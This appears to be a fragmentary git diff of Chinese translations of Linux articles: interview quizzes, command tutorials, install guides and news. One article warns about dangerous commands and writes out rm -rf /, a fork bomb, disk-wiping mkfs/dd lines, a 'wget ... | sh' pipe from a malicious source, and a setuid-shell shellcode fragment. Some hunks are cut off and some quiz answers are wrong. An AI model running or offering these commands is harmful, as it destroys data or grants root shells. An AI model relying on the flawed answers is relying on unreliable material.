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Linux 面试基础问题 - 3
- [11个基本的Linux面试问题及答案 – 第一部分][1]
- [10个基本的Linux面试问题及答案 – 第二部分][2]
### Q.1. 你如何向你的系统中添加一个新的用户(例如,tux)? ###
- 使用useradd指令
- 使用adduser 指令
- 使用linuxconf指令
- 以上全是
- 以上答案全都不对
> **答** : 以上全是,即useradd, adduser 和 linuxconf 都可向你的linux系统添加新用户。
### Q.2. 在一个硬盘上,可能有多少主分区? ###
- 1
- 2
- 4
- 16
> **答** : 一个硬盘上最多可能有4个主分区。
### Q.3. Apache/Http 的默认端口号是多少? ###
- 8080
- 80
- 8443
- 91
- 以上答案全都不对
> **答** : Apache/Http默认配置是**80**端口
### Q.4. GNU代表什么? ###
- GNU's not Unix
- General Unix
- General Noble Unix
- Greek Needed Unix
- 以上答案全都不对
> **答** : GNU意为**GNU's not Unix**.
### Q.5. 如果你在shell提示符中输入mysql并得到“can’t connect to local MySQL server through socket ‘/var/mysql/mysql.sock’ ”的提示,你首先应该检查什么? ###
> **答** : 看到这条错误消息,我首先会使用**service mysql status**或者**service mysqld status**指令来检查mysql服务是否正在运行。如果mysql服务没有运行,就启动所需服务。
### Q.6. 如何将windows ntfs分区挂载到Linux上面? ###
> **答** : 首先,使用**apt**或者**yum**工具安装ntfs3g包,然后使用
“**sudo mount t ntfs3g /dev/<Windows ntfs的分区号> /<挂载点>**” 命令来将windows分区挂载到Linux上面
### Q.7. 下面哪一个不是基于RPM的操作系统? ###
- RedHat Linux
- Centos
- Scientific Linux
- Debian
- Fedora
> **答** : ‘**Debian**’ 系统不是基于**RPM**的,其它的几个都是
### Q.8. Linux中,哪一个指令用来重命名文件? ###
- mv
- ren
- rename
- change
- 以上答案全都不对
> **答** : 在Linux中,**mv** 指令用来重命名一个文件。例如:**mv /path_to_File/original_file_name.extension /Path_to_File/New_name.extension**
### Q.9. 在Linux中,哪个命令用来创建并显示文件? ###
- ed
- vi
- cat
- nano
- 以上答案全都不对
> **答** : ‘**cat**‘ 命令用来创建并且显示文件
### 10. 哪层协议用于支持用户和程序,如支持密码、资源分享、文件传输和网络管理? ###
- 第四层协议
- 第五层协议
- 第六层协议
- 第七层协议
- 以上答案全都不对
> **答** : ‘**第七层协议**‘
via: http://www.tecmint.com/linux-interview-questions-and-answers-for-linux-beginners/
译者:[tomatoKiller](https://github.com/tomatoKiller) 校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -0,0 +1,97 @@
Linux命令行佷有用、很高效,也很有趣,但有时候也很危险,尤其是在你不确定你自己在正在做什么时候。这篇文章并不打算引来你对**Linux**或**linux 命令行**的愤怒。我们只是想让你意识到在你运行某些命令时应该三思而后行。(译注:当然,以下命令通常都是在root权限下才能将愚蠢发挥到无可救药;在普通用户身份下,破坏的只是自己的一亩三分地。)
### 1. rm -rf 命令 ###
**rm -rf**命令是删除文件夹及其内容最快的方式之一。仅仅一丁点的敲错或无知都可能导致不可恢复的系统崩坏。下列是一些**rm 命令**的选项。
- **rm** 命令在Linux下通常用来删除文件。
- **rm -r** 命令递归的删除文件夹,甚至是空的文件夹。(译注:个人认为此处应该是说错了,从常识看,应该是“甚至是非空的文件夹”)
- **rm -f** 命令能不经过询问直接删除‘只读文件’。(译注:Linux下删除文件并不在乎该文件是否是只读的,而只是在意其父目录是否有写权限。所以,-f这个参数只是表示不必一个个删除确认,而是一律悄悄删除。另外,原始的rm命令其实也是没有删除提示的,只是一般的发行版都会将rm通过别名的方式增加-i参数来要求删除确认,而-f则抑制了这个提示。)
- **rm -rf /** : 强制删除根目录下所有东东。(就是说删除完毕后,什么也没有了。。。)
- rm -rf *: 强制删除当前目录的所有文件。
- **rm -rf .** : 强制删除当前文件夹及其子文件夹。
从现在起,当你要执行**rm -rf**命令时请留心一点。我们可以在“**.bashrc**”文件对‘**rm**‘命令创建**rm -i**的别名,来预防用 ‘**rm**‘命令删除文件时的事故,它会要求你确认每一个删除请求。(译注:大多数发行版已经这样做了,如果还没有,请这样做,并在使用-f参数前一定考虑好你在做什么!译者本人有着血泪的教训啊。)
### 2. :(){:|:&};: 命令###
这就是个**fork 炸弹**的实例。具体操作是通过定义一个名为 ‘:‘的函数,它会调用自己两次,一次在前台另一次运行在后台。它会反复的执行下去直到系统崩溃。
### 3. 命令 > /dev/sda ###
### 4. mv 文件夹 /dev/null ###
这个命令会移动某个‘**文件夹**‘到**/dev/null**。在Linux中 **/dev/null** 或 **null** 设备是一个特殊的文件,所有写入它的数据都会被清除,然后返回写操作成功。(译注:这就是黑洞啊。当然,要说明的是,通过将文件夹移动到黑洞,并不能阻止数据恢复软件的救赎,所以,真正的彻底毁灭,需要采用专用的软件或者手法来完成——我知道你肯定有些东西想删除得干干净净的。)
# mv /home/user/* /dev/null
上列命令会将**User**目录所有内容移动到**/dev/null**,这意味着所有东西都被‘卷入’**黑洞 (null)**之中。
### 5. wget http://malicious_source -O- | sh ###
**注意**: 你应该时刻注意你下载包或脚本的源。只能使用那些从可信任的源中下载脚本/程序。(译注:所以,你真的知道你在做什么吗?当遇到这种需要是,我的做法是,先wget下来,然后我去读一读其中到底写了些什么,然后考虑是否执行。)
### 6. mkfs.ext3 /dev/sda ###
### 7. > file###
上列命令常用来清空文件内容(译注:通常也用于记录命令输出。不过请在执行前,确认输出的文件是空的或者还不存在,否则原来的文件可真是恢复不了了——连数据恢复软件都未必能帮助你了。另外,我想你可能真正想用的是“>>”,即累加新的输出到文件,而不是刷新那个文件。)。如果用上列执行时输入错误或无知的输入类似 “> **xt.conf**” 的命令会覆盖配置文件或其他任何的系统配置文件。
### 8. \^foo\^bar ###
这个命令在我们[十个鲜为人知的 Linux 命令 - Part 3][1]中描述过,用来编辑先前运行的命令而无需重打整个命令。但当用**^foo^bar**命令时如果你没有彻底检查改变原始命令的风险,这可能导致真正的麻烦。(译注:事实上,这种小技巧是译者认为的,少数史前时代遗留下来的无用而有害的“黑客”技巧。)
### 9. dd if=/dev/random of=/dev/sda ###
### 10. 隐藏命令 ###
下面的命令其实就是上面第一个命令 (**rm -rf**)。这里的代码是隐藏在**十六进制**里的,一个无知的用户可能就会被愚弄。在终端里运行下面命令可能会擦除你的**根**分区。
char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
**注意**: 不要在你的或你的同学或学校的电脑里的**Linux**终端或Shell执行以上的任何一个命令。如果你想测试它们,请在虚拟机上运行。任何不和谐或数据丢失,由于运行上面的命令导致你的系统崩溃,文章**作者**和**Tecmint**概不负责。(译注:译者和转载网站也不负责~!)
via: http://www.tecmint.com/10-most-dangerous-commands-you-should-never-execute-on-linux/
译者:[Luoxcat](https://github.com/Luoxcat) 校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -2,25 +2,25 @@ ps命令的10个例子
### Linux ps 命令 ###
### 语法说明 ###
> 注意: "ps aux"不等同于"ps -aux"。比如"-u"用于显示用户的进程,但是"u"意味着显示具体信息。
BSD 形式 - BSD形式的语法的选项前没有破折号。
BSD 形式 - BSD形式的语法的选项前没有破折号,如:
ps aux
UNIX/LINUX 形式 - linux形式的语法的选项前有破折号。
UNIX/LINUX 形式 - linux形式的语法的选项前有破折号,如:
ps -ef
在linux系统上混合这两种语法是可以的。比如 "ps ax -f"。但是本章中我们主要讨论unix形式语法。
> 在linux系统上混合这两种语法是可以的。比如 "ps ax -f"。但是本章中我们主要讨论UNIX形式语法。
### 如何使用ps命令 ###
@ -31,16 +31,15 @@ UNIX/LINUX 形式 - linux形式的语法的选项前有破折号。
$ ps ax
$ ps -ef
$ ps aux
$ ps -ef -f
> 为什么USER列显示的不是我的用户名而是其他的像root,www-data等等?
> 为什么USER列显示的不是我的用户名,但是其他的像root,www-data等却显示?
> 对于所有的用户(包括你们的),如果长度大于8个字符,那么ps只会显示你的UID而不是用户名。
#### 2. 显示用户进程 ####
@ -68,20 +67,19 @@ UNIX/LINUX 形式 - linux形式的语法的选项前有破折号。
4525 ? 00:00:00 apache2
$ ps -f -p 3150,7298,6544
$ ps -f -p 3150,7298,6544
$ ps -ef | grep apache
#### 4. 通过cpu或者内存使用排序进程 ####
$ ps aux --sort=-pcpu,+pmem
@ -96,7 +94,7 @@ UNIX/LINUX 形式 - linux形式的语法的选项前有破折号。
#### 5. 以树的形式显示进程层级 ####
许多进程实际上是从同一个父进程fork出来的,并且了解父子关系通常是很有用的。"--forest" 选项会构造一个ascii艺术形式的进程层级视图。
许多进程实际上是从同一个父进程fork出来的,了解父子关系通常是很有用的。"--forest" 选项会构造一个ascii艺术形式的进程层级视图。
@ -109,7 +107,7 @@ UNIX/LINUX 形式 - linux形式的语法的选项前有破折号。
www-data 4527 2359 0 10:03 ? 00:00:00 \_ /usr/sbin/apache2 -k start
www-data 4528 2359 0 10:03 ? 00:00:00 \_ /usr/sbin/apache2 -k start
> 尽量不要在排序中使用树状显示,因为两者都会以不同方式影响显示的顺序。
> 不要在排序中使用树状显示,因为两者都会以不同方式影响显示的顺序。
#### 6. 显示父进程的子进程 ####
@ -123,11 +121,9 @@ UNIX/LINUX 形式 - linux形式的语法的选项前有破折号。
4526 www-data apache2
4527 www-data apache2
4528 www-data apache2
$ ps --ppid 2359
4524 ? 00:00:00 apache2
@ -138,7 +134,7 @@ UNIX/LINUX 形式 - linux形式的语法的选项前有破折号。
#### 7. 显示进程的线程 ####
@ -146,7 +142,7 @@ UNIX/LINUX 形式 - linux形式的语法的选项前有破折号。
#### 8. 改变显示的列 ####
@ -166,7 +162,7 @@ ps命令可以被配置用来只显示被选中的列。很多列可以被用来
9 root 0.0 0.0 rcuob/0
10 root 0.0 0.0 rcuob/1
#### 9. 显示进程运行的时间 ####
@ -176,12 +172,11 @@ ps命令可以被配置用来只显示被选中的列。很多列可以被用来
#### 10. 将ps转换为实时进程查看器 ####
As usual, the watch command can be used to turn ps into a realtime process reporter. Simple example is like this
$ watch -n 1 'ps -e -o pid,uname,cmd,pmem,pcpu --sort=-pmem,-pcpu | head -15'
Every 1.0s: ps -e -o pid,uname,cmd,pmem,pcpu --... Sun Dec 1 18:16:08 2013
@ -201,16 +196,14 @@ As usual, the watch command can be used to turn ps into a realtime process repor
3677 1000 /opt/google/chrome/chrome - 1.5 0.4
3639 1000 /opt/google/chrome/chrome - 1.4 0.4
via: http://www.binarytides.com/linux-ps-command/
译者:[geekpi](https://github.com/geekpi) 校对:[校对者ID](https://github.com/校对者ID)
译者:[geekpi](https://github.com/geekpi) 校对:[Caroline](https://github.com/carolinewuyan)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -0,0 +1,164 @@
Linux 面试基础问题 - 2
自本系列的上一篇文章[11个基本的 Linux 面试问题][1],我们分析了不同论坛对此作出的评论,这对我们将更好的文章提供给我们的读者是很重要的。我们付出了时间和金钱,那我们又渴望从你们身上得到什么回报呢?答案是没有的。如果你不能赞扬我们的工作,但恳请不要在评论中诋毁我们的工作。
### Q.1:哪一条命令用于把用户登录会话记录在文件中? ###
- macro
- read
- script
- record
- sessionrecord
> **答**:‘script’ 命令是用来把用户登录的会话信息记录在文件里。这条命令能够用在 shell 脚本里面,或者直接在终端中使用。下面是一个例子,它记录了开始用 script 到输入 exit 结束之间的所有东西。
[root@tecmint ~]# script my-session-record.txt
Script started, file is my-session-record.txt
[root@tecmint ~]# nano my-session-record.txt
script started on Friday 22 November 2013 08:19:01 PM IST
[root@tecmint ~]# ls
^[[0m^[[01;34mBinary^[[0m ^[[01;34mDocuments^[[0m ^[[01;34mMusic^[[0m $
^[[01;34mDesktop^[[0m ^[[01;34mDownloads^[[0m my-session-record.txt ^[[01;34$
### Q.2:以下那一条命令可以用来查看内核日志信息 ###
- dmesg
- kernel
- ls -i
- uname
- 以上全不是
> **答**:执行 'dmesg' 命令可以查看内核的日志信息。在上面的命令中,kernel 不是一个有效的命令,'ls -i' 是用来列出工作目录中文件的索引节点,而 'uname' 是用来显示操作系统信息的。
[root@tecmint ~]# dmesg
Initializing cgroup subsys cpuset
Initializing cgroup subsys cpu
Linux version 2.6.32-279.el6.i686 (mockbuild@c6b9.bsys.dev.centos.org) (gcc version 4.4.6 20120305 (Red Hat 4.4.6-4) (GCC) ) #1 SMP Fri Jun 22 10:59:55 UTC 2012
KERNEL supported cpus:
Intel GenuineIntel
AMD AuthenticAMD
NSC Geode by NSC
Cyrix CyrixInstead
Centaur CentaurHauls
Transmeta GenuineTMx86
Transmeta TransmetaCPU
Disabled fast string operations
BIOS-provided physical RAM map:
### Q.3:哪一条命令是用来显示 Linux 内核发行信息的? ###
- uname -v
- uname -r
- uname -m
- uname -n
- uname -o
> **答**:‘uname -r’是用来显示内核的发行信息。其它参数‘-v’、‘-m’、‘-n’、‘o’分别显示内核版本、机器硬件名称、网络节点、主机名和操作系统。
[root@tecmint ~]# uname -r
### Q.4:那一条命令是被用来识别文件类型的? ###
- type
- info
- file
- which
- ls
> **答**:‘file’命令是用来识别文件类型的。其语法是‘file [选项] 文件名’。
[root@tecmint ~]# file wtop
wtop: POSIX shell script text executable
### Q.5:哪一条命令是被用来找一条命令的二进制文件、源和手册的所在的路径? ###
> **答**:‘whereis’驾到!‘whereis’命令是用来找一条命令的二进制文件、源和手册的所在的路径。
[root@tecmint ~]# whereis /usr/bin/ftp
ftp: /usr/bin/ftp /usr/share/man/man1/ftp.1.gz
### Q.6:当用户登录时,默认情况下哪些文件会被调用作为用户配置? ###
> **答**:在用户的目录下‘.profile’和‘.bashrc’会默认地被调用作为用户配置。
[root@tecmint ~]# ls -al
-rw-r--r--. 1 tecmint tecmint 176 May 11 2012 .bash_profile
-rw-r--r--. 1 tecmint tecmint 124 May 11 2012 .bashrc
### Q.7:‘resolve.conf’文件是什么的配置文件? ###
> **答**:‘/etc/resolve.conf’ 是 DNS 客户端的配置文件。
[root@tecmint ~]# cat /etc/resolv.conf
### Q.8:哪一条命令是用来创建一个文件的软链接的? ###
- ln
- ln -s
- link
- link -soft
- 以上都不是
> **答**:在 Linux 环境下,‘ls -s’是被用来创建一个文件的软链接的。
[root@tecmint ~]# ln -s /etc/httpd/conf/httpd.conf httpd.original.conf
### Q.9:在Linux下,‘pwd’命令是‘passwd’命令的别名吗? ###
> **答**:不是!默认情况下‘pwd’命令不是‘passwd’命令的别名。‘pwd’是‘print working directory’(显示工作目录)的缩写,也就是输出当前的工作目录,而‘passwd’在 Linux 中是被用来更改用户的帐号密码。
[root@tecmint ~]# pwd
[root@tecmint ~]# passwd
Changing password for user root.
New password:
Retype new password:
### Q.10:在 Linux 中,你会怎样检测 pci 设备的厂商和版本。 ###
> **答**:我们用的 Linux 命令是‘lspci’。
[root@tecmint ~]# lspci
00:00.0 Host bridge: Intel Corporation 5000P Chipset Memory Controller Hub (rev b1)
00:02.0 PCI bridge: Intel Corporation 5000 Series Chipset PCI Express x8 Port 2-3 (rev b1)
00:04.0 PCI bridge: Intel Corporation 5000 Series Chipset PCI Express x8 Port 4-5 (rev b1)
00:06.0 PCI bridge: Intel Corporation 5000 Series Chipset PCI Express x8 Port 6-7 (rev b1)
00:08.0 System peripheral: Intel Corporation 5000 Series Chipset DMA Engine (rev b1)
现在就到这里。我希望以上的问题也许对你很有用。在下星期我会再想出一些新的问题。到时请保持好的健康,继续关注我们并且与 Tecmint 保持联系喔!
via: http://www.tecmint.com/basic-linux-interview-questions-and-answers-part-ii/
译者:[hyaocuk](https://github.com/hyaocuk) 校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -0,0 +1,29 @@
这两款笔记本设计定位不在于性能强悍,设计定位为办公型,同时还可能针对一些多媒体内容的需求。华硕的1015E笔记本配备了Intel的Celeron 847 1.1GHz的处理器,2GB DDR3内存,320GB 5400转硬盘,以及一个10.1英寸的屏幕。
另一款已经脱销的产品华硕X201E则提供不多的性能提升:Intel Celeron 847(1.1GHz)Sandy Bridge处理器,4GB DDR3内存,320GB 5400转硬盘,11.6英寸的屏幕和Intel GMA HD显卡。
via: http://news.softpedia.com/news/Canonical-and-ASUS-Have-Formed-a-Partnership-in-USA-404483.shtml
译者:[stduolc](https://github.com/stduolc) 校对:[wxy](https://github.com/wxy)
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@ -0,0 +1,50 @@
每日Ubuntu小技巧 - 使用TeamViewer连接远程桌面
TeamViewer,是一款热门的远程支持和桌面共享工具,并且它的Windows版、Mac OS X版和Linux版(包含Ubuntu)已经更新到版本 9 了。TeamViewer 允许你在任何地方通过网络控制任何电脑。
因此我们两个人都花了几分钟下载了 TeamViewer,我连接上了她的电脑并且帮她安装了那个程序。
这是一个 TeamViewer 如何帮助你解决问题的例子,如果你准备使用 TeamViewer 来帮助你的顾客或者是客户的话,你可能需要购买一个授权许可来遵守公司的政策。
我宁愿选择 TeamViewer 而不选择其它远程支持工具的另外一个原因是它允许你直接使用,无需安装,至少在 Windows 上是这样。如果你只使用一次的话,那么你只需要运行它,而它却不会占用你的磁盘空间。
现在 TeamViewer 能够在几乎所有操作系统上运行,包括 Android 和 IOS。
Windows 用户可以 [从这里下载 TeamViewer][1]
Ubuntu 用户可以 [从这链接下载并运行 TeamViewer][2]
在 Ubuntu 轻松安装 TeamViewer,运行下面的命令来下载安装程序
wget http://download.teamviewer.com/download/teamviewer_linux.deb
对于 **64位操作系统**, 使用下面的链接.
wget http://download.teamviewer.com/download/teamviewer_linux_x64.deb
sudo dpkg -i teamviewer_linux*.deb; sudo apt-get -f install
如果上述的命令不能成功运行的话,那么就去 TeamViewer [下载页面来下载][2].
via: http://www.liberiangeek.net/2013/12/daily-ubuntu-tips-teamviewer-9-is-available-for-download/
译者:[hyaocuk](https://github.com/hyaocuk) 校对:[Caroline](https://github.com/carolinewuyan)
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@ -1,18 +1,20 @@
每日Ubuntu小技巧 - 更换菜单风格
每日Ubuntu小技巧 - 使用旧式Gnome风格的菜单
每日Ubuntu小技巧 - 喜欢GNOME风格菜单?安装Class Menu Indicator吧
喜欢GNOME风格菜单?安装Class Menu Indicator吧。
如果你是一个老资格,想要在Ubuntu的Unity回到GNOME风格的菜单,安装Classic Menu Indicator 可以解决这个问题。这个俏皮的包被安装在顶部面板的通知区域,在Ubuntu中带回了GNOME风格菜单体验。
如果你是一个老资格用户,想要在Ubuntu的Unity回到GNOME风格的菜单,安装Classic Menu Indicator 可以解决这个问题。这个有趣的包被安装在顶部面板的通知区域,在Ubuntu中带回了GNOME风格菜单体验。
马上开始,在键盘上按下 **Ctrl – Alt – T** 打开终端。
sudo apt-add-repository ppa:diesch/testing
@ -21,7 +23,8 @@
sudo apt-get update && sudo apt-get install classicmenu-indicator
安装完成后,在Unity Dash中启动。它叫Classic Menu Indicator.当你启动它的时候,它会自动的嵌入顶部面板,如下图。
安装完成后,在Unity Dash中启动。它叫Classic Menu Indicator。当你启动它的时候,它会自动的嵌入顶部面板,如下图。
@ -29,6 +32,6 @@
via: http://www.liberiangeek.net/2013/11/daily-ubuntu-tipslike-gnome-classic-menu-get-classic-menu-indicator/
译者:[Vic___](http://blog.csdn.net/Vic___) 校对:[校对者ID](https://github.com/校对者ID)
译者:[Vic___](http://blog.csdn.net/Vic___) 校对:[wxy](https://github.com/wxy)
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@ -1,16 +1,17 @@
@ -30,6 +31,6 @@
via: http://www.liberiangeek.net/2013/11/daily-ubuntu-tipsprotect-your-computers-using-opendns-secure-dns-infrastructure/
译者:[Linux-pdz](https://github.com/Linux-pdz) 校对:[校对者ID](https://github.com/校对者ID)
译者:[Linux-pdz](https://github.com/Linux-pdz) 校对:[wxy](https://github.com/wxy)
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@ -0,0 +1,24 @@
Faenza和Faience的发明者, **Ubuntu设计师 Matthieu "Tiheum" James**,发布了一篇富有见地的有趣文章,这篇文章围绕着几个图标的发明展开,使得对此感兴趣的用户和第三方开发人员能够直观地了解一个专业的设计师是怎样创作一个图标的。
via: http://iloveubuntu.net/deepen-your-creative-knowledge-explanatory-user-friendly-icon-creation-design-story
译者:[crowner](https://github.com/crowner) 校对:[Mr小眼儿](http://blog.csdn.net/tinyeyeser)
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published/GCC 4.9 Is Now In Bug-Fixes-Only Stage 3 Mode.md
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published/GCC 4.9 Is Now In Bug-Fixes-Only Stage 3 Mode.md
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@ -0,0 +1,23 @@
GCC 4.9现在处于修复BUG的第三阶段
拥有很多[新功能][2]的[GCC 4.9][1]将定于2014年上半年发布。这个GCC的基础代码将不会增加新的功能,目前将只修改大的BUG。
Richard Biener宣称代码主干目前处于第三阶段,因此在之后的八个月这些功能将融入到4.9版本,除非有发布主管认可的特例发生,不然不会增加新的功能了。第三阶段只做普通BUG的修复工作,将在2个月内完成,而后到达只编写文档和回归测试的第四阶段。
目前GCC4.9有63个P1 回归测试(最严重的回归测试)其次是136个P2回归测试,14个P3回归测试,88个P4回归测试 以及60个P5回归测试。直到P1阶段的63个回归测试完成,GCC4.9才接近发布。GCC 4.9.0发布版将可能在2014第二季度左右到来!
GCC 4.9.0状态报告可以在[GCC mailing list][3]中被找到。GCC 4.9将会是一个非常棒的更新,并会挑战下个月发布的[LLVM3.4][4]。
via: http://www.phoronix.com/scan.php?page=news_item&px=MTUyMjk
译者:[Vic___](http://blog.csdn.net/Vic___) 校对:[wxy](https://github.com/wxy)
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published/How To Display And Set Hostname in Linux.md
Normal file
published/How To Display And Set Hostname in Linux.md
Normal file
@ -0,0 +1,145 @@
### 什么是hostname ###
从它的操作手册来看,hostname是用来显示系统的DNS名字以及为了显示和设置它的主机名或者NIS域名名字。所以hostname依赖于DNS(Domain Name System域名系统)或者NIS(Network Information System网络信息系统)。
### 怎么显示hostname ###
$ hostname
上面的命令将会告诉你,计算机的名字是**ubuntu** 。
### 如何设置hostname ###
# hostname dev-machine
$ hostname
使用hostname命令设置你的hostname **不是永久的** 。当你重启你的计算机,你的设定将会失效。 **为了永久改变** ,你必须手动修改hostname配置文件。
**Debian / Ubuntu系的Linux**
你可以在 **/etc/hostname** 和 **/etc/hosts** 文件夹中找到这个文件
# vi /etc/hostname
# vi /etc/hosts
|||| localhost
|||| dev-machine
**RedHat / CentOS系的Linux**
你可以在 **/etc/hosts** 和 **/etc/sysconfig/networks** 文件夹中找到这个文件。
|||| localhost.localdomain localhost dev-machine
### 怎么显示DNS域名 ###
$ dnsdomainname
在本篇文章,dnsdomainname命令的结果是 **bris.co.id**。
如果你看见结果是 (**none**),那么你的机器**没有配置FQDN(Fully Qualified Domain Name 完全符合标准的域名)** 。dnsdomainname命令摘取来自**/etc/hosts**文件的信息。你应该配置它为FQDN格式。下面是一个简单的例子:
|||| localhost.localdomain localhost dev-machine
|||| dev-machine.bris.co.id dev-machine
$ dnsdomainname -v
Resolving ‘dev-machine.bris.co.id’ …
Result: h_name=’dev-machine.bris.co.id’
Result: h_aliases=’dev-machine’
Result: h_addr_list=’’
### 如何显示hostname的更多细节信息###
$ hostname -i
$ hostname -d
$ hostname -s
$ hostname -f
所有的参数包括上述信息,都可以通过使用参数**-v** 和 **-d** 来概括。让我们来看一个例子。
$ hostname -v -d
Resolving ‘dev-machine.bris.co.id’ …
Result: h_name=’dev-machine.bris.co.id’
Result: h_aliases=’dev-machine’
Result: h_addr_list=’’
觉得熟悉吗?没错,运行结果与上面提到的 **dnsdomainname -v** 命令式相同的。
via: http://linoxide.com/linux-command/display-set-hostname-linux/
译者:[Vic___](http://blog.csdn.net/Vic___) 校对:[Caroline](https://github.com/carolinewuyan)
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@ -0,0 +1,98 @@
- 用Kdenlive录制屏幕录像
- 用Audacity录制音轨
- 添加音轨到Kdenlive
- 上传到YouTube
- 全世界看你的视频,好开心
kdenlive支持最流行的数字视频格式,包括AVI,MP4,H.264,和MOV。它支持的图像文件包括GIF,PNG,SVG和TIFF;支持的音频文件格式,包括非压缩的PCM,Vorbis,WAV,MP3和 AC3。你甚至可以阅读和编辑Flash文件。总之,它可以处理很多东西。
Kdenlive的文档已过期,它会告诉你制作屏幕录像需要RecordMyDesktop软件。我用的是kdenlive 0.9.4,其实不需要Recordmydesktop。
*图 1:默认配置*
### 制作屏幕录像 ###
这是我的屏幕录像的设置:高清720p每秒30帧,1280x720的屏幕尺寸。如何知道该使用什么设置项? [Google上有一些说明][1]。设置这些值可到Settings > Configure Kdenlive > Project Defaults > Default Profile > HD 720p 30fps(图1)。
设置捕捉屏幕的大小到 Settings > Configure Kdenlive > Capture > Screen Grab(图2)。虽然你也可以选择捕捉全屏幕,但最好还是坚持用YouTube规定的尺寸。因为如果使用的尺寸与YouTube规定的不一样,则YouTube将增加黑边来达到合适的尺寸。热切的观众会更加希望看到一个充满生动的内容的屏幕,而不是黑边。
*图 2:屏幕录像的屏幕大小*
### 保存你的项目 ###
在你做任何其他事情之前,点击 File->Save as 保存您的项目,并记住周期性地保存它。
### 抓取屏幕 ###
抓屏小菜一碟。到Record Monitor,选择Screen Grab,然后点击Record按钮。屏幕上将打开一个带虚线的框,框里面的所有内容都将被录制下来。因此,你需要做的所有事就是移动框并调整框的大小到你想要l录制的范围。完成后点击停止按钮(图3)。
*图 3:屏幕抓取*
单击Stop,自动打开Clip Monitor,你可以预览你的裁剪效果。如果你觉得不错,把它从Project Tree中拖到Video 1轨道。现在你可以编辑你的视频了。总会有需要你修剪的地方;一个快速的方法是,你在Project Monitor里播放你的剪辑片,直到播放到你需要移除部分的末尾。然后暂停,然后按下Shift+r。你的剪辑片将会在你按下停止的时间轴上的点上被切割为两个剪辑。点击你要删除的片断,按下Delete键,噗!它就消失了。
对于剩下的剪辑片断,可能你想要从时间轴上的某一点开始播放,也可能你想要加入一些好的变换。比如一些简单的渐变就相当不错;右键点击你的剪辑片断,点击Add Effect > Fade > Fade from black 和 Fade to black,然后Kdenlive将自动将这两个效果放到开头和末尾。
### 添加配音 ###
请参阅[Whirlwind Intro to Audacity on Linux: From Recording to CD in One Lesson][2]来学习使用Audacity录音的基础操作。以16bit的wav格式导出你的音频文件,然后通过Project > Add Clip导入到Kdenlive。然后将你的新音频剪辑拖到Audio tracks。一个简单的制作视频讲述的方式是边播视频边说。运气好的话,你不需要做很多的清理工作,你的讲述就会与视频同步。
*图 4:用Shift+r切割音轨,然后将其中一个剪辑片从切割点拖离,创建一个静音间隙*
### Rendering Your Project ### 渲染你的项目
当你满意自己的编辑,并准备导出你的最终格式时,点击Render按钮。这需要几分钟的时间,取决于你的电脑速度和项目大小。已有为网站预先设定的值,如果你选择File Rendering, 你可以调整你的设置(图5)。我用File Rendering中的H.264,Video比特率12000, Audio比特率384取得了不错的效果。H.264是一种超压缩格式,使用这种格式发布的文件小但质量好。
*图 5:选择文件渲染,调整你的网页设置*
### 发布到YouTube ###
来源于: http://www.linux.com/learn/tutorials/745745-how-to-make-a-youtube-instructional-screencast-video-on-linux/
译者:[coolpigs](https://github.com/coolpigs) 校对:[jasminepeng](https://github.com/jasminepeng)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -1,6 +1,6 @@
@ -35,7 +35,7 @@ Ghost成功运行后,终端中会有以下输出信息,告诉你Ghost正运
在你的浏览器中键入 http://<YOUR_IP>:2368,身份校验后你就会看到Ghost的初始页面。
在你本机的浏览器中键入 http://<YOUR_IP>:2368,身份校验后你就会看到Ghost的初始页面。
@ -57,10 +57,12 @@ Ghost成功运行后,终端中会有以下输出信息,告诉你Ghost正运
$ sudo forever list
> info: Forever processes running
> data: uid command script forever pid logfile uptime
> data: [0] cH0O /usr/bin/nodejs index.js 15355 15357 /home/dev/.forever/cH0O.log 0:0:0:37.741
info: Forever processes running
data: uid command script forever pid logfile uptime
data: [0] cH0O /usr/bin/nodejs index.js 15355 15357 /home/dev/.forever/cH0O.log 0:0:0:37.741
@ -0,0 +1,89 @@
使用PPA在Elementary OS 'Luna'上安装Oracle Java 7
**问题**: 我该如何在 Elemetary OS Luna 上安装Oracle Java 7?
**回答**: 在 Elementary OS Luna 安装 Java 7 的步骤如下:
由于Elementary OS是基于Ubuntu,所以我们允许使用具有多种Java包的**WEPUD8 PPA**。
1. 打开终端。
2. 运行以下指令添加Java的PPA到你的软件仓:
$ sudo add-apt-repository ppa:webupd8team/java
You are about to add the following PPA to your system:
Oracle Java (JDK) Installer (automatically downloads and installs Oracle JDK6 / JDK7 / JDK8). There are no actual Java files in this PPA. More info: http://www.webupd8.org/2012/01/install-oracle-java-jdk-7-in-ubuntu-via.html
Debian installation instructions: http://www.webupd8.org/2012/06/how-to-install-oracle-java-7-in-debian.html
More info: https://launchpad.net/~webupd8team/+archive/java
Press [ENTER] to continue or ctrl-c to cancel adding it
3. 按回车继续
gpg: keyring `/tmp/tmpB5WwDG/secring.gpg' created
gpg: keyring `/tmp/tmpB5WwDG/pubring.gpg' created
gpg: requesting key EEA14886 from hkp server keyserver.ubuntu.com
gpg: /tmp/tmpB5WwDG/trustdb.gpg: trustdb created
gpg: key EEA14886: public key "Launchpad VLC" imported
gpg: Total number processed: 1
gpg: imported: 1 (RSA: 1)
4. 现在更新你的系统
$ sudo apt-get update
5. 运行以下命令安装Java 7:
$ sudo apt-get install oracle-java7-installer
[sudo] password for enock:
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages were automatically installed and are no longer required:
gir1.2-gstreamer-0.10 libilmbase6 libmagickcore4 libmagickwand4 libcdt4
libmagickcore4-extra liblqr-1-0 imagemagick-common libpathplan4 libopenexr6
